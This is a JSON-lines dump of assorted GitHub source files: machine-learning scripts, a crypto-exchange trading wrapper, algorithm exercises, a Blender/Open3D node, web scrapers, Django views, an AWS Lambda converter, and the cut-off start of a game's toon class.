+{"seq_id":"31232656842","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\nLICENSE: MulanPSL2\nAUTHOR: cnhemiya@qq.com\nDATE: 2022-06-05 21:45\n文档说明: 图像分割裁剪\n\"\"\"\n\n\nimport paddlex as pdx\nfrom paddlex import transforms as T\nimport mod.utils\nimport mod.args\nimport mod.config as config\n\n\ndef prune():\n # 解析命令行参数\n args = mod.args.PruneXSeg()\n # 检查文件或目录是否存在\n args.check()\n # 使用 cuda gpu 还是 cpu 运算\n config.user_cude(not args.cpu)\n\n # 定义训练和验证时的 transforms\n # API说明:https://gitee.com/PaddlePaddle/PaddleX/blob/develop/docs/apis/transforms/transforms.md\n train_transforms = T.Compose([\n T.Resize(target_size=512),\n T.RandomHorizontalFlip(),\n T.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n\n eval_transforms = T.Compose([\n T.Resize(target_size=512),\n T.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n\n # 定义训练和验证所用的数据集\n # API说明:https://gitee.com/PaddlePaddle/PaddleX/blob/develop/docs/apis/datasets.md\n train_dataset = pdx.datasets.SegDataset(\n data_dir=args.dataset,\n file_list=args.train_list,\n label_list=args.label_list,\n transforms=train_transforms,\n num_workers=args.num_workers,\n shuffle=True)\n\n eval_dataset = pdx.datasets.SegDataset(\n data_dir=args.dataset,\n file_list=args.eval_list,\n label_list=args.label_list,\n transforms=eval_transforms,\n num_workers=args.num_workers,\n shuffle=False)\n\n # 加载模型\n print(\"读取模型 。。。读取路径:{}\".format(args.model_dir))\n model = pdx.load_model(args.model_dir)\n\n # Step 1/3: 分析模型各层参数在不同的裁剪比例下的敏感度\n # 注意:目标检测模型的裁剪依赖PaddleSlim 2.1.0\n # 注意:如果之前运行过该步骤,第二次运行时会自动加载已有的 'save_dir'/model.sensi.data,不再进行敏感度分析\n # API说明:https://gitee.com/paddlepaddle/PaddleX/blob/develop/docs/apis/models/semantic_segmentation.md#analyze_sensitivity\n # 使用参考:https://gitee.com/paddlepaddle/PaddleX/tree/develop/tutorials/slim/prune/semantic_segmentation\n if not args.skip_analyze:\n print(\"敏感度分析 。。。保存路径:{}\".format(args.save_dir))\n model.analyze_sensitivity(\n dataset=eval_dataset,\n batch_size=args.batch_size,\n save_dir=args.save_dir)\n\n # Step 2/3: 根据选择的FLOPs减小比例对模型进行裁剪\n # API说明:https://gitee.com/paddlepaddle/PaddleX/blob/develop/docs/apis/models/semantic_segmentation.md#prune\n # 使用参考:https://gitee.com/paddlepaddle/PaddleX/tree/develop/tutorials/slim/prune/semantic_segmentation\n print(\"对模型进行裁剪 。。。FLOPS:{}\".format(args.pruned_flops))\n model.prune(pruned_flops=args.pruned_flops)\n\n # 优化器\n # https://gitee.com/paddlepaddle/PaddleX/blob/develop/paddlex/cv/models/segmenter.py#L189\n\n # 模型训练\n # API说明:https://gitee.com/paddlepaddle/PaddleX/blob/develop/docs/apis/models/semantic_segmentation.md\n # 使用参考:https://gitee.com/paddlepaddle/PaddleX/tree/develop/tutorials/slim/prune/semantic_segmentation\n # 可使用 VisualDL 查看训练指标,参考:https://gitee.com/PaddlePaddle/PaddleX/blob/develop/docs/visualdl.md\n print(\"开始训练 。。。保存路径:{}\".format(args.save_dir))\n model.train(num_epochs=args.epochs,\n train_dataset=train_dataset,\n train_batch_size=args.batch_size,\n eval_dataset=eval_dataset,\n save_dir=args.save_dir,\n save_interval_epochs=args.save_interval_epochs,\n log_interval_steps=args.log_interval_steps,\n learning_rate=args.learning_rate,\n lr_decay_power=args.lr_decay_power,\n early_stop=args.early_stop,\n early_stop_patience=args.early_stop_patience,\n resume_checkpoint=args.resume_checkpoint,\n pretrain_weights=args.pretrain_weights,\n use_vdl=True)\n print(\"结束训练 。。。保存路径:{}\".format(args.save_dir))\n\n\ndef main():\n # 裁剪\n prune()\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"cnhemiya/bmm-paddle-helper","sub_path":"templates/paddlex_seg/prune.py","file_name":"prune.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"}
+{"seq_id":"33601277158","text":"from __future__ import print_function, division\n\nimport time\nfrom PIL import Image\nfrom torchvision.transforms import transforms\nfrom transforms.pad_to_square import pad_to_square\nimport numpy as np\n\nfrom utils.utils import AverageMeter, accuracy\nfrom utils.img_utils import compute_gradient, save_img\n\n\ndef test(val_loader, model, device, save_imgs=False, show=False):\n batch_time = AverageMeter()\n\n eval_fingers_recall = AverageMeter()\n eval_fingers_precision = AverageMeter()\n\n eval_frets_recall = AverageMeter()\n eval_frets_precision = AverageMeter()\n\n eval_strings_recall = AverageMeter()\n eval_strings_precision = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n\n for data_idx, data in enumerate(val_loader):\n input = data['image'].float().to(device)\n target = data['fingers'].float().to(device)\n frets = data['frets'].float().to(device)\n strings = data['strings'].float().to(device)\n target_coord = data['finger_coord']\n frets_coord = data['fret_coord']\n strings_coord = data['string_coord']\n img_number = data['img_number']\n\n # compute output\n output = model(input)\n output1 = output[0].split(input.shape[0], dim=0)\n output2 = output[1].split(input.shape[0], dim=0)\n output3 = output[2].split(input.shape[0], dim=0)\n\n if show:\n import matplotlib.pyplot as plt\n import torchvision.transforms as transforms\n fig, ax = plt.subplots(1, 3)\n ax[0].imshow(target[0][0].cpu(), cmap='gray')\n ax[1].imshow(output1[-1][0][0].cpu().detach(), cmap='gray')\n ax[2].imshow(transforms.ToPILImage()(input.cpu()[0]))\n plt.show()\n\n # measure accuracy\n accuracy(output=output1[-1].data, target=target,\n global_precision=eval_fingers_precision, global_recall=eval_fingers_recall, fingers=target_coord,\n min_dist= 10)\n\n accuracy(output=output2[-1].data, target=frets,\n global_precision=eval_frets_precision, global_recall=eval_frets_recall,\n fingers=frets_coord.unsqueeze(0), min_dist=5)\n\n accuracy(output=output3[-1].data, target=strings,\n global_precision=eval_strings_precision, global_recall=eval_strings_recall,\n fingers=strings_coord.unsqueeze(0), min_dist=5)\n\n if save_imgs:\n save_img(input.cpu().detach()[0], output1[-1][0][0].cpu().detach().numpy(), 10, 'image{num}_fingers'.format(num=data['img_number'][0]))\n save_img(input.cpu().detach()[0], output2[-1][0][0].cpu().detach().numpy(), 5, 'image{num}_frets'.format(num=data['img_number'][0]))\n save_img(input.cpu().detach()[0], output3[-1][0][0].cpu().detach().numpy(), 5, 'image{num}_strings'.format(num=data['img_number'][0]))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n print('FINGERS: \\t'\n 'Recall(%): {top1:.3f}\\t'\n 'Precision(%): {top2:.3f}\\n'\n 'FRETS: \\t'\n 'Recall(%): {top6:.3f}\\t'\n 'Precision(%): {top7:.3f}\\n'\n 'STRINGS: \\t'\n 'Recall(%): {top11:.3f}\\t'\n 'Precision(%): {top12:.3f}\\n'\n .format(top1=eval_fingers_recall.avg * 100, top2=eval_fingers_precision.avg * 100,\n top6=eval_frets_recall.avg * 100, top7=eval_frets_precision.avg * 100,\n top11=eval_strings_recall.avg * 100, top12=eval_strings_precision.avg * 100))\n\n return eval_fingers_recall.avg, eval_frets_recall.avg, eval_strings_recall.avg, eval_fingers_precision.avg, \\\n eval_frets_precision.avg, 
eval_strings_precision.avg","repo_name":"AlbertMitjans/chord-detection","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"}
+{"seq_id":"32180112672","text":"from lib.common.msg import info, warn\nfrom lib.common.id_map_poloniex import id_to_poloniex\nfrom lib.common.id_ticker_map import id_to_ticker\nfrom lib.common.orderbook import estimate_fill_price, FillPriceEstimate\nfrom lib.trader import poloniex_api\nfrom lib.trader.trader import Trader\n\n# limit price estimate is based on (qty requested) x (overcommit_factor)\novercommit_factor = 1.1\n\nclass PoloniexTraderError(RuntimeError):\n def __init__(self, message: str):\n super().__init__(message)\n\nclass PoloniexTrader(Trader):\n\n @staticmethod\n def handles_sym(sym: str) -> bool:\n return sym in id_to_poloniex.keys()\n\n def __init__(self, sym: str, api_key: str, secret: str):\n self.pair = id_to_poloniex[sym]\n self.ticker = id_to_ticker[sym]\n self.api = poloniex_api.Poloniex(api_key, secret)\n\n def _handle_trade(self, response: dict) -> tuple[float,float]:\n if 'resultingTrades' in response.keys():\n trades = response['resultingTrades']\n total_qty_coin = sum( [float(x['amount']) for x in trades] )\n total_qty_usd = sum( [float(x['total']) for x in trades] )\n fill_price = total_qty_usd / total_qty_coin\n return [fill_price, total_qty_coin]\n elif 'error' in response.keys():\n raise PoloniexTraderError(response['error'])\n else:\n raise PoloniexTraderError(f\"unknown error : {response}\")\n\n\n def buy_market(self, qty: float, qty_in_usd: bool) -> tuple[float,float]:\n self._check_trx_balance()\n if qty_in_usd:\n qty_tokens = qty / self.api.returnTicker(self.pair)\n else:\n qty_tokens = qty\n estimate_price = estimate_fill_price(self.api.returnOrderBook(self.pair)['asks'], qty_tokens*overcommit_factor)\n response = self.api.buy(self.pair, estimate_price.limit, qty_tokens, {'fillOrKill': True})\n return self._handle_trade(response)\n\n def sell_market(self, qty_tokens: float) -> tuple[float,float]:\n self._check_trx_balance()\n estimate_price = estimate_fill_price(self.api.returnOrderBook(self.pair)['bids'], qty_tokens*overcommit_factor)\n response = self.api.sell(self.pair, estimate_price.limit, qty_tokens, {'fillOrKill': True})\n return self._handle_trade(response)\n\n def sell_limit(self, qty_tokens: float, limit_price: float, auto_top_up_commission_tokens: bool = False) -> tuple[float,float]:\n if auto_top_up_commission_tokens:\n self._check_trx_balance()\n response = self.api.sell(self.pair, limit_price, qty_tokens, {'fillOrKill': True, 'immediateOrCancel': True})\n return self._handle_trade(response)\n\n\n def estimate_fill_price(self, qty: float, side: str) -> FillPriceEstimate:\n assert side in [\"buy\", \"sell\"]\n if side == \"buy\":\n return estimate_fill_price(self.api.returnOrderBook(self.pair)['asks'], qty*overcommit_factor)\n else:\n return estimate_fill_price(self.api.returnOrderBook(self.pair)['bids'], qty*overcommit_factor)\n\n def get_available_qty(self) -> float:\n return float(self.api.returnBalances()[self.ticker])\n\n def _check_trx_balance(self):\n qty = float(self.api.returnBalances()['TRX'])\n market_price = float(self.api.returnOrderBook(\"USDT_TRX\")['asks'][1][0])\n if qty * market_price < 50:\n add_qty = round(10 / market_price)\n info(f\"PoloniexTrader: buying {add_qty:.1f} additional TRX tokens\")\n self.api.buy(\"USDT_TRX\", market_price*1.01, add_qty, {'fillOrKill': True})\n new_qty = float(self.api.returnBalances()['TRX'])\n if new_qty < add_qty:\n warn(\"PoloniexTrader: failed to buy TRX 
tokens\")\n","repo_name":"AbigalChulchill/investment-utils","sub_path":"lib/trader/poloniex_trader.py","file_name":"poloniex_trader.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"}
+{"seq_id":"25522074669","text":"import sys\n\n\ndef dfs(cnt):\n global N, M, num_list, visited\n\n if cnt == M:\n sys.stdout.write(' '.join(answer) + '\\n')\n return\n\n for i in range(N):\n if not visited[i]:\n visited[i] = 1\n answer.append(str(num_list[i]))\n dfs(cnt+1)\n visited[i] = 0\n answer.pop()\n\n\nif __name__ == '__main__':\n N, M = map(int, input().split())\n num_list = sorted(list(map(int, sys.stdin.readline().split())))\n visited = [0 for _ in range(N)]\n answer = []\n\n dfs(0)","repo_name":"jjungyeun/AlgorithmStudy2021","sub_path":"Baekjoon/2106/15654.py","file_name":"15654.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"6326336893","text":"\nimport copy\nimport bpy\nfrom bpy.props import EnumProperty, IntProperty\nfrom mathutils import Matrix\n\nimport sverchok\nfrom sverchok.node_tree import SverchCustomTreeNode\nfrom sverchok.data_structure import updateNode\nfrom sverchok.utils.nodes_mixins.recursive_nodes import SvRecursiveNode\n\nfrom sverchok_open3d.dependencies import open3d as o3d\nfrom sverchok.utils.dummy_nodes import add_dummy\n\nif o3d is None:\n add_dummy('SvO3TriangleMeshSamplingNode', 'Triangle Mesh Sampling', 'open3d')\nelse:\n class SvO3TriangleMeshSamplingNode(bpy.types.Node, SverchCustomTreeNode, SvRecursiveNode):\n \"\"\"\n Triggers: O3D Mesh Sampling\n Tooltip: Points over Open3d mesh. Mesh to Point Cloud\n \"\"\"\n bl_idname = 'SvO3TriangleMeshSamplingNode'\n bl_label = 'Triangle Mesh Sampling'\n bl_icon = 'MESH_DATA'\n sv_icon = 'SV_RANDOM_NUM_GEN'\n methods = [\n ('UNIFORM', \"Uniform\", \"Uniform Sampling\", 0),\n ('POISSON', \"Poisson Disk\", \"Poisson Disk Sampling\", 1),\n ]\n normal_methods = [\n ('TRIANGLES', \"From Faces\", \"Calculate Normals From Faces\", 0),\n ('VERTEX', \"From Vertex\", \"Calculate Normals From Vertices\", 1),\n ('NONE', \"None\", \"If mesh does not have normals, the point cloud will not have normals\", 2),\n ]\n\n method: EnumProperty(\n name=\"Method\",\n items=methods,\n default='POISSON',\n update=updateNode)\n normal_method: EnumProperty(\n name=\"Normal\",\n items=normal_methods,\n default='TRIANGLES',\n update=updateNode)\n\n num_points: IntProperty(\n name=\"Point Number\",\n default=100,\n update=updateNode)\n init_factor: IntProperty(\n name=\"Init Factor\",\n description='Initial Points will be Init Factor X Number of points ',\n default=5,\n update=updateNode)\n seed: IntProperty(\n name=\"Seed\",\n description='Random Seed Value, -1 to use a different every update',\n default=1,\n update=updateNode)\n\n def sv_init(self, context):\n self.inputs.new('SvO3TriangleMeshSocket', \"O3D Triangle Mesh\").is_mandatory = True\n num_points = self.inputs.new('SvStringsSocket', \"Points Number\")\n num_points.prop_name = 'num_points'\n num_points.nesting_level = 1\n num_points.pre_processing = 'ONE_ITEM'\n seed = self.inputs.new('SvStringsSocket', \"Seed\")\n seed.prop_name = 'seed'\n seed.nesting_level = 1\n seed.pre_processing = 'ONE_ITEM'\n\n self.outputs.new('SvO3PointCloudSocket', 'O3D Point Cloud')\n\n def draw_buttons(self, context, layout):\n layout.prop(self, 'method')\n layout.prop(self, 'normal_method')\n\n def draw_buttons_ext(self, context, layout):\n layout.prop(self, 'list_match')\n self.draw_buttons(context, layout)\n if self.method == 'POISSON':\n layout.prop(self, 'init_factor')\n\n def rclick_menu(self, context, layout):\n layout.prop_menu_enum(self, \"list_match\", text=\"List Match\")\n\n def process_data(self, params):\n\n pcd_out = []\n\n for mesh, points_num, seed in zip(*params):\n\n if self.normal_method == 'TRIANGLES':\n use_triangle_normal = True\n elif self.normal_method == 'VERTEX':\n use_triangle_normal = False\n mesh = copy.deepcopy(mesh)\n mesh.compute_vertex_normals()\n else:\n use_triangle_normal = False\n if self.method == 'POISSON':\n pcd = mesh.sample_points_poisson_disk(\n points_num,\n init_factor=self.init_factor,\n use_triangle_normal=use_triangle_normal,\n seed=seed)\n else:\n pcd = mesh.sample_points_uniformly(\n number_of_points=points_num,\n use_triangle_normal=use_triangle_normal,\n seed=seed)\n pcd_out.append(pcd)\n\n return pcd_out\n\n\n\ndef register():\n if o3d is not None:\n 
bpy.utils.register_class(SvO3TriangleMeshSamplingNode)\n\ndef unregister():\n if o3d is not None:\n bpy.utils.unregister_class(SvO3TriangleMeshSamplingNode)\n","repo_name":"vicdoval/sverchok-open3d","sub_path":"nodes/triangle_mesh/triangle_mesh_sampling.py","file_name":"triangle_mesh_sampling.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"18"}
+{"seq_id":"35885001249","text":"import requests\nfrom lxml import html\nimport urllib\n\nid = 152293\ndomain = 'https://www.russianfood.com/recipes/recipe.php?rid='\n\ndef getContent(id):\n\n url = domain + str(id)\n\n print('getContent(): send request to %s' % url)\n try:\n r = requests.get(url, timeout=30)\n except Exception as e:\n print(e)\n\n content = ''\n if r.reason == 'OK':\n print('getContent(): status OK')\n \n content = r.text\n \n return content\n\ndef get_products(content):\n tree = html.fromstring(content)\n\n products = []\n for element in tree.xpath('//td[@class=\"padding_l padding_r\"]/span'):\n product = element.text.lower()\n if '-' in product:\n product = product.split(' - ')[0]\n\n products.append(product)\n\n return products\n\ndef get_label(content):\n tree = html.fromstring(content)\n\n label = None\n for element in tree.xpath('//span[@class=\"rcp\"]'):\n label = element.text\n return label\n\ndef get_text(content):\n tree = html.fromstring(content)\n\n text = ''\n for element in tree.xpath('//div[@class=\"step_n\"]/p'):\n text += element.text + ' '\n return text","repo_name":"kuznetsov-m/Datamonetize-hack","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"25016010355","text":"#!/Users/htlin/.pyenv/versions/automator/bin/python\n# -*- coding: utf-8 -*-\n# title: tweet\n# date: \"2023-03-25\"\n# @raycast.title Tweet\n# @raycast.author HTLin the 🦎\n# @raycast.authorURL https://github.com/htlin222\n# @raycast.description\n\n# @raycast.icon 🐦\n# @raycast.mode silent\n# @raycast.packageName System\n# @raycast.schemaVersion 1\n\nimport os\nimport yaml\nimport tweepy\nfrom pathlib import Path\n\n# Get path to home directory\nhome_dir = str(Path.home())\n\n# Define path to YAML file\nyaml_path = os.path.join(home_dir, 'KEY', 'twitter.yaml')\n\n# Load API keys and access tokens from YAML file\nwith open(yaml_path, 'r') as file:\n config = yaml.safe_load(file)\n\nconsumer_key = config['consumer_key']\nconsumer_secret = config['consumer_secret']\naccess_token = config['access_token']\naccess_token_secret = config['access_token_secret']\n\n# Authenticate with Twitter API\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\n# Create API object\napi = tweepy.API(auth)\n\n# Create a tweet\napi.update_status(\"Hello Tweepy\")\n","repo_name":"htlin222/dotfiles","sub_path":"pyscripts.symlink/tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"44570018640","text":"from django.http import HttpResponse, Http404\nfrom datetime import datetime, timedelta\nfrom django.shortcuts import render\nfrom django.template import loader\n\n\ndef hello(request):\n return HttpResponse('hello, world')\n\n\ndef hours_head(request, offset):\n try:\n offset = int(offset)\n except ValueError:\n raise Http404\n dt = datetime.now() + timedelta(hours=offset)\n html = 'In {}hours, it will be {}.'.format(offset, dt)\n return HttpResponse(html)\n\n\ndef current_datetime(request):\n now = datetime.now()\n t = loader.get_template('current_datetime.html')\n print(request.path)\n print(request.get_host())\n print(request.get_full_path())\n print(request.is_secure())\n values = request.META.items()\n html = []\n for k, v in values:\n html.append((k, v))\n c = {\n 'now': now,\n 'html': html,\n }\n return HttpResponse(t.render(c, request))\n\n\n\ndef searh_form(request):\n return render(request, 'searh_form.html')\n","repo_name":"hdguodada/djangobook","sub_path":"mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"72463613162","text":"# 치킨 배달(순서가 바뀌어도 결과에 영향이 없으므로 조합)\nfrom itertools import combinations\n\n\ndef get_sum(location_home, case):\n result = 0\n for x1, y1 in location_home:\n temp = int(1e9)\n for x2, y2 in case:\n temp = min(temp, abs(x1 - x2) + abs(y1 - y2))\n result += temp\n return result\n\n\nn, m = map(int, input().split())\ngraph = []\nlocation_home = []\nlocation_chicken = []\nfor i in range(n):\n data = list(map(int, input().split()))\n graph.append(data)\n for j in range(n):\n if data[j] == 1:\n location_home.append((i, j))\n elif data[j] == 2:\n location_chicken.append((i, j))\n\ncases = combinations(location_chicken, m)\nresult = int(1e9)\nfor case in cases:\n result = min(result, get_sum(location_home, case))\n\nprint(result)\n","repo_name":"Dong-Jun-Shin/Study_Algorithm_Python","sub_path":"Coding_test/practice_turn_2/02_implementation/prac_turn2_Q_13.py","file_name":"prac_turn2_Q_13.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"23864039380","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Recommendation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=255, null=True)),\n ('info', models.TextField(null=True)),\n ('map_img', models.ImageField(upload_to=b'maps', blank=True)),\n ('image', models.ImageField(upload_to=b'recommendations')),\n ('phone_number', models.CharField(max_length=13, null=True)),\n ],\n ),\n ]\n","repo_name":"RababKM/Recoms","sub_path":"main/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"32408571593","text":"import cv2 as cv \nimport numpy as np \n\nimg = cv.imread('../Images/thresholding.png',0)\ncv.imshow('Before binarization',img)\ncv.waitKey(0)\n\nthresh, binarized = cv.threshold(img,0,255,cv.THRESH_BINARY+cv.THRESH_OTSU)\n\n#Threshold value as found by Otsu's Algorithm\nprint(\"Threshold value: \",thresh)\n\ncv.imshow('Binarized Image',binarized)\ncv.waitKey(0)\n","repo_name":"mahirjain25/Digital-Image-Processing","sub_path":"Thresholding/otsu.py","file_name":"otsu.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"22056181837","text":"import numpy as np\n\ndef vol_tehrahedron(poly):\n \"\"\"volume of a irregular tetrahedron\"\"\"\n a = np.array(poly[0])\n b = np.array(poly[1])\n c = np.array(poly[2])\n d = np.array(poly[3])\n return abs(np.dot((a-d), np.cross((b-d),(c-d))) / 6)\n\ndef central_p(poly1,poly2):\n central_point = np.array([0.0, 0.0, 0.0])\n for i in range(len(poly1)):\n central_point += np.array(poly1[i]) + np.array(poly2[i])\n return central_point/ (len(poly1)) / 2\n\ndef vol(poly1,poly2):\n \"\"\"\"volume of a zone defined by two polygon bases \"\"\"\n c_point = central_p(poly1, poly2)\n c_point = (c_point[0], c_point[1], c_point[2])\n vol_therah = 0\n N = len(poly1)\n poly1.append(poly1[0])\n poly2.append(poly2[0])\n for i in range(N-2):\n # the upper part\n tehrahedron = [c_point,poly1[0], poly1[i+1], poly1[i+2]]\n vol_therah += vol_tehrahedron(tehrahedron)\n # the bottom part\n tehrahedron = [c_point,poly2[0], poly2[i+1], poly2[i+2]]\n vol_therah += vol_tehrahedron(tehrahedron)\n # the middle part\n for i in range(N):\n tehrahedron = [c_point, poly1[i], poly2[i], poly2[i+1]]\n vol_therah += vol_tehrahedron(tehrahedron)\n tehrahedron = [c_point, poly1[i], poly1[i+1], poly2[i]]\n vol_therah += vol_tehrahedron(tehrahedron)\n return vol_therah","repo_name":"cmiller8/eppy","sub_path":"eppy/geometry/volume_zone.py","file_name":"volume_zone.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"}
+{"seq_id":"42804431675","text":"import os\nimport re\nimport PyPDF2\nfrom langchain.callbacks import get_openai_callback\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.schema import HumanMessage\nfrom config.config import TOKEN\n\n# Set the OpenAI API key\nos.environ['OPENAI_API_KEY'] = TOKEN\n\n# Open the PDF file\nwith open('../input/ABC123_verificacion_vehicular.pdf', 'rb') as pdfFileObj:\n # Create a PDF reader object\n pdfReader = PyPDF2.PdfReader(pdfFileObj)\n\n # Get the number of pages in the PDF file\n print(f\"Number of pages: {len(pdfReader.pages)}\")\n\n # Get the first page of the PDF\n pageObj = pdfReader.pages[0]\n\n # Extract the text from the page and remove extra spaces between characters\n text = re.sub(r\"(?<=\\w) (?=\\w)\", \"\", pageObj.extract_text())\n\n # Search for the license plate in the text\n match = re.search(r'(placa|Número de Placa|patente|license_plate)(.{0,30})', text, re.IGNORECASE | re.DOTALL)\n if match:\n segment = match.group(0) # The license plate and the following 30 characters\n else:\n print(\"No license plate found in the document.\")\n exit(1)\n\n# Construct the content for the chat\ncontent = \"You are a text interpreter API. Your responses should always be in JSON format, using the following \" \\\n \"structure: {\\\"result\\\": \\\"$result\\\"}. Now, please search the license_plate or also called placa in spanish in \" \\\n \"the following text: \" + segment\n\n# Initialize the chat model\nchat = ChatOpenAI(temperature=0, model_name=\"gpt-3.5-turbo\")\n\n# Use the OpenAI callback to print the chat response and callback\nwith get_openai_callback() as cb:\n print(chat([HumanMessage(content=content)]))\n print(cb)\n","repo_name":"ldmarz/nlp-scripts","sub_path":"src/text_from_pdf_extractor.py","file_name":"text_from_pdf_extractor.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"33593164302","text":"class Node:\n def __init__(self, data=None, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n\nclass BST:\n def __init__(self):\n self.root = None\n self.size = 0\n\n def insert(self, item):\n node = Node(item)\n if self.root is None:\n self.root = node\n else:\n current = self.root\n while True:\n if item < current.data:\n if current.left is None:\n current.left = node\n break\n else:\n current = current.left\n else:\n if current.right is None:\n current.right = node\n break\n else:\n current = current.right\n self.size += 1\n\n def delete(self, item):\n self.root = self._delete(self.root, item)\n\n def _delete(self, node, item):\n if node is None:\n return None\n if item < node.data:\n node.left = self._delete(node.left, item)\n elif item > node.data:\n node.right = self._delete(node.right, item)\n else:\n if node.left is None:\n return node.right\n elif node.right is None:\n return node.left\n else:\n min_node = self._find_min(node.right)\n node.data = min_node.data\n node.right = self._delete(node.right, min_node.data)\n self.size -= 1\n return node\n\n def _find_min(self, node):\n while node.left is not None:\n node = node.left\n return node\n\n def search(self, item):\n current = self.root\n while current is not None:\n if item == current.data:\n return True\n elif item < current.data:\n current = current.left\n else:\n current = current.right\n return False\n\n def size(self):\n return self.size\n","repo_name":"nanduskumar33/pythonAssignments","sub_path":"bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"37124679687","text":"import json\nimport urllib.parse\nimport boto3\nimport csv\nprint('Loading function')\ns3 = boto3.client('s3')\n\ndef lambda_handler(event, context):\n print(\"Received event: \" + json.dumps(event, indent=2))\n # Get the object from the event and show its content type\n bucket = event['Records'][0]['s3']['bucket']['name']\n key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')\n if \"json\" in key:\n try:\n response = s3.get_object(Bucket=bucket, Key=key)\n response_body = response['Body'].read()\n data = json.loads(response_body.decode('utf-8'))\n Flat_json = flatten_json(data['web-app']) \n write_csv(Flat_json,'|')\n upload_file()\n #write the data into '/tmp' folder\n return response['ContentType']\n except Exception as e:\n print(e)\n print('Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))\n raise e\n \ndef flatten_json(y):\n out = {}\n def flatten(x, name=''):\n if type(x) is dict:\n for a in x:\n flatten(x[a],name +a+ '|')\n elif type(x) is list:\n i = 0\n for a in x:\n flatten(a, name + str(i) + '|')\n i += 1\n else:\n out[name[:-1]] = x\n\n flatten(y)\n return out\n \n# Upload the file\ndef upload_file():\n #Method 2: Client.put_object()\n s3 = boto3.resource('s3')\n #try:\n #print('bucketname'+str(bucket))\n s3.Bucket('testingdmsunique').upload_file(r'/tmp/SampleJson.csv', 'SampleJson1.csv')\n #except ClientError as e:\n # logging.error(type(e))\n # return False\n return True\n\ndef write_csv(flat_json,delim):\n data_file = open(r'/tmp/SampleJson.csv', 'w',newline='') \n # create the csv writer object \n csv_writer = csv.writer(data_file) \n # Counter variable used for writing \n # headers to the CSV file \n count = 0\n count2 = 0\n print(data_file)\n \n for f in flat_json: \n if count == 0: \n # Writing headers of CSV file \n header = flat_json.keys()\n csv_writer.writerow(header) \n count += 1 \n # Writing data of CSV file \n for k,v in flat_json.items():\n concat = str(k)+str(delim)+str(v)\n csv_writer.writerow([concat])\n data_file.close()\n \n \n","repo_name":"divadf/dms-fileconv","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"74084018922","text":"from direct.directnotify.DirectNotifyGlobal import directNotify\nfrom direct.interval.IntervalGlobal import Sequence, Wait, Func, SoundInterval\nfrom direct.interval.IntervalGlobal import Parallel, LerpPosInterval, LerpQuatInterval, LerpHprInterval\n\nfrom DistributedPlayerToonShared import DistributedPlayerToonShared\nfrom src.coginvasion.toon.DistributedToon import DistributedToon\nfrom src.coginvasion.gags.backpack.Backpack import Backpack\nfrom src.coginvasion.gags import GagGlobals\nfrom src.coginvasion.gui.LaffOMeter import LaffOMeter\nfrom src.coginvasion.hood import LinkTunnel\nfrom src.coginvasion.globals import ChatGlobals\nfrom src.coginvasion.phys import PhysicsUtils\nfrom src.coginvasion.distributed import AdminCommands\n\nclass DistributedPlayerToon(DistributedToon, DistributedPlayerToonShared):\n notify = directNotify.newCategory('DistributedPlayerToon')\n \n def __init__(self, cr):\n try:\n self.DistributedPlayerToon_initialized\n return\n except:\n self.DistributedPlayerToon_initialized = 1\n DistributedToon.__init__(self, cr)\n 